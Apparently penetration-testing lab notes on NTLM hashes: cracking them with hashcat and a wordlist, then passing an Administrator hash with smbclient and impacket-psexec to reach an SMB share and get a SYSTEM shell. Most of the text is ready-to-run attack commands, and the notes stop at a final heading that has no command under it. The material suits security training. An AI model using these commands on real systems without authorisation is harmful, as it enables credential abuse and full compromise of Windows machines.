Crack or Pass NTLM hashes

All of this is done from Kali. It requires having an NTLM hash in our possession.

Crack

hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Pass-The-Hash to access SMB share

We can't crack the Administrator hash we obtained. However, we can simply pass it, together with the corresponding username, to authenticate. This is possible because NTLM passwords are not salted: the hash itself is the credential, so no cracking is needed.

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

We're now able to access the share.

Pass-The-Hash execute command / get shell

Pass-the-hash with psexec requires SMB (File and Printer Sharing) to be enabled on the target, which is common. Also, 88% sure our user must be a local admin on the target.

This will spawn cmd.exe (i.e. we get a shell) running as NT AUTHORITY\SYSTEM:

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

(Keep the 32 zeros, which stand in for the empty LM hash, and put the NT hash after the colon.)

We could also append a specific command at the end of the line if we want something other than a shell.

Shell as Administrator user

If for some reason we don't want a shell as NT SYSTEM but as the Administrator user instead, we can use this:
